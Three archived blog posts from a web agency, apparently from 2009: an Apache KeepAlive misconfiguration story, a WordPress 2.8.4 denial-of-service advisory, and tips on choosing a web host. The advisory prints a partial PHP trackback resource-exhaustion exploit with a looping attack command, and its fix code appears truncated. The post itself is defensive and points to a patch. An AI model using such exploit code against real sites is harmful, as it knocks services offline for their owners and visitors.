Apache Web Server Over Optimization: A Cautionary Tale

Posted on November 5, 2009 by Glenn Jimerson

When it comes to squeezing every ounce of performance from an Apache web server it is easy to make changes that can have dire consequences to your sites. Sometimes you can see your web server load go up right away so it’s easy to tell you are headed in the wrong direction. But, some modifications can make a real mess of things in a much more subtle way.

The Problem:

Load on my web server went up when several of my competitor’s sites got booted from the top 10 of Google which left my site as the lone survivor for a very competitive key word. That day my poor little 2.8 dual Xenon with 2GB of RAM web server went from a average load of 2.7 to well over 80 and had spikes in the 100+ range.

How I “Fixed” It:

I went in and started messing with the httpd.conf file. I changed just about everything under the sun and then thought it would be smart to turn KeepAlive off. Now I could free up all those idle connections hogging memory until they time out. It was supposed to be a win-win. My visitors will get a better experience and load will go down. Or so the theory goes…

Why This Went Horribly Wrong:

If you run web sites that have lots of pictures each time one of the photos was grabbed from the server it made a new connection. So if you have a page that has 60 images you can see how the number of connections each user was making adds up quickly. If they have one of those web caching programs/plugins that will follow links and download pages automatically in order to speed up dial up browsing it gets even worse.

As part of my server hardening I run (D)DoS Deflate a great DDOS mitigating script written by the good folks a Medialayer. Since KeepAlive was off these visitors were making hundreds of completely legitimate connections to the web server. (D)DoS Deflate would see this and then ban their IP. I can’t blame the script it was doing exactly what I told it to do. The effect was that thousands of visitors and potential customers were getting their IP’s banned from my server. Yeah Ouch!

Fixing the “Fixed”:

In the first thirty minutes of the Apache reconfiguration I received easily 100 banned IP notifications. I thought that my server was getting DDOS’ed and was comforted by my superior server hardening and Apache tweaking skills. And then the next half an hour I got another 100. I knew something was up. Then I got an e-mail from a friend of mine alerting me to one of my sites being unavailable. That was odd since I was literally writing a post in WordPress. Taking a look at the log, sure enough he had been banned. Luckily, I made the connection between (D)DoS deflate and KeepAlive and quickly turned it back on. Everything was right with the world again.

Lessons Learned:

If you run sites with lots of photos on individual pages do not turn KeepAlive off if you are running (D)Dos Deflate
Always remember that Apache is a part of your server eco-system. Mess one up, mess them all up. Your Apache ninja skills are never good enough to prevent all screw ups so be careful.
It’s great when your competitors lose their ranking leaving you in the top spot in Google for competitive keywords.

P.S. No actual clients were harmed. This event happened on a server reserved for my own personal affiliate work.

Temporary Fix for WordPress 2.8.4 Exploit

Posted on October 20, 2009 by Glenn Jimerson

This exploit has been patched in the new 2.8.5 version of WordPress. Download it at: http://wordpress.org/download/

If you are running WordPress 2.8.4 there is an exploit out there that will allow someone to DOS your site.

Here is a TEMPORARY fix until there is an official update from WordPress:

Copy this code into your theme’s functions.php file. If there isn’t a file called functions.php create one.


 50 ) {  die; }
                }
        }
}
add_action('init','ft_stop_trackback_dos_attacks');

?>

Here is the proof of concept code (i.e. the exploit) DO NOT put this in your functions.php:

<?php
/*
 * wordpress Resource exhaustion Exploit
 * http://rooibo.wordpress.com/
 * security@wordpress.org contacted and get a response,
 * but no solution available.
 * 
 * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org 
 * 
 * exploiting:
 * you must install php-cli (command line interface)
 * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
 * 
 */
if(count($argv) < 2)
    die("You need to specify a url to attackn");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
    die("The url should have http:// in front of it, and should be complete.n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
    $path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n

5 Tips on How to Select a Good Web Host

Posted on March 27, 2009 by Glenn Jimerson

No matter if you have a large ecommerce web site or looking for a place to set up a blog, everyone who has an Internet presence is using web hosting. A reliable web host is more than just a computer where you dump your stuff. They act as your silent partner in the web world. If a web site is a virtual store then a web host would be the ground underneath.

There are several types of webhosting you can use such as:

Shared hosts
Virtual Private Servers (VPS)
Dedicated Servers

Regardless of the type of hosting you need, keep these 5 tips to keep in mind when selecting your next web host.

Be Wary of Any Host That Offers Unlimited Anything

The majority of web sites will use less than 100 MB of storage space and might use a GB of bandwidth a month. Web hosts know this and will advertise their hosting pages as “Unlimited” bandwidth, hard drive space, or both.

They can do this because for every 100 customers that use virtually no resources there will be 1 that actually does have a popular resource intensive web site. So, a balance is created where the popular site uses more server resources while most of the sites use a lot less.

Here is the hidden “gotcha”: if you are the owner of that popular site it is very common for the web host to demand that you upgrade to a more expensive account or even a dedicated server. If you read the TOS carefully, you’ll see they can do this at any time. This is about as close to bait and switch you can get in the hosting world.

The bottom line is that unlimited really isn’t unlimited. It’s more like: unlimited until you hit an arbitrary undisclosed usage level then you have to pony up some more cash or get the heck off the server.

Never Pre-Pay for Multiple Months in Advance

May hosts will offer a discount if you sign up for 3, 6, or 12 months up front. In exchange for paying one big lump sum, they provide a pretty significant discount. This is a bad idea for three reasons:

If the web host’s service should decline over time and you want to switch to a new host, you can kiss the unused portion of the pre-paid amount goodbye. This also applies to web hosts that go out of business. When they fold there is very little chance of getting your money back.
If your site grows and the web host demands that you upgrade, the pre-paid balance usually applies to the new rate but you can’t get a discount on the new rate without committing to even more time.
If the host decides to kick you off their servers due to a TOS violation then you forfeit the unused portion. For example a client of mine pre-paid HostICan for 12 months of service. The service was fine for 3 months and then when his gallery script started using too much processor time they killed the account and refused to refund the pre-paid portion. The amount was too small to take to small claims court. So, not only was his site removed without warning costing him sales but, he also had to go through the pain of manually moving his site to a new host.

Guaranteed Uptime is B.S.

Sometime in the early days of the Internet, a web host got the bright idea to advertise that they have 99.9%. While this looks good in ad copy it’s a hollow promise that 99.9% of them cannot back up with data. 99.9% uptime equates to about 44 minutes of down time per month or 8 hours and 45 minutes a year. This is a pretty easy hurdle to clear assuming nothing out of the ordinary happens like a DDOS attack or hard drive failure.

Unless you have multiple redundant web servers all over the world there is going to be some downtime. It’s not possible to predict how much downtime a server will have, and if the person could accurately guess, they would be better off picking Kentucky Derby winners than being server administrators.

Overall, don’t factor the uptime guarantee into your hosting choice. It’s complete B.S.

24/7 Technical Support isn’t Always 24/7

A lot of hosts promise this but few can actually deliver. Unfortunately, web server problems do not always happened during regular business hours. Your web site can go down at any time and having support staff available is the difference between being down a couple of minutes or being down for hours. Your web host must have people available 24/7 to handle any problems that may arise.

You can easily test the support capabilities of your host and their response time easily. All you need to do is submit a support ticket at an off time like after midnight on a weekend. You should expect more than just an acknowledgement of receipt but an actual answer/solution to your problem. If you don’t get a resolution or at least an acknowledgement that they are working on the problem in an hour then that should be a red flag. If they have a support phone number give that a ring as well. Again a person that can actually solve your question should be available not just an operator that tells you that they are working on it. One caveat is that small problems will often be prioritized lower than a critical problem like a sever going down. So during off peak times fewer staff will be available so a small problem will have a longer delay than normal.

Doing Your Homework Can Save you From a Major Headache

There are hundreds of web hosts out there. They span the gamut from excellent to just plain bad. Price is not a reliable indicator of quality. Since they all offer a slightly different mix of hard drive space, bandwidth, control panels, etc…, it is difficult to accurately compare them to each other. By doing some basic research you can quickly weed out the poor performers.

I use message boards like Web Hosting Talk to research potential hosting providers. By using their search feature, you can find all the posts , good and bad, that discuss your potential future host. Make sure to read through both the positive and negative reviews. Not all negative reviews are based on something the host can control and not all positive reviews are unbiased. I’ve seen more than one suspiciously glowing review of a host.

Of course you can also use Google to find out more info. Just do a search for:

WebHostName problems
WebHostName issues
WebHostnme downtime
WebHostname review

Keep in mind to take any recommendation with a grain of salt. Any review will be biased but at least you can quickly weed out the losers and identify popular hosts from the rest of the pack.

Overall, the best advice I can give you is when you do find a good web host that has good support, features, and uptime, stick with them. Chasing after a dollar or two savings per month is not worth the hassle or potential down time.

Happy web host shopping and make sure to check back often. I’ll be releasing a comprehensive guide to selecting the right type of web hosting for your site in the next couple weeks.

Vista Web Media

Phoenix Arizona Search Engine Optimization

Category Archives: Technical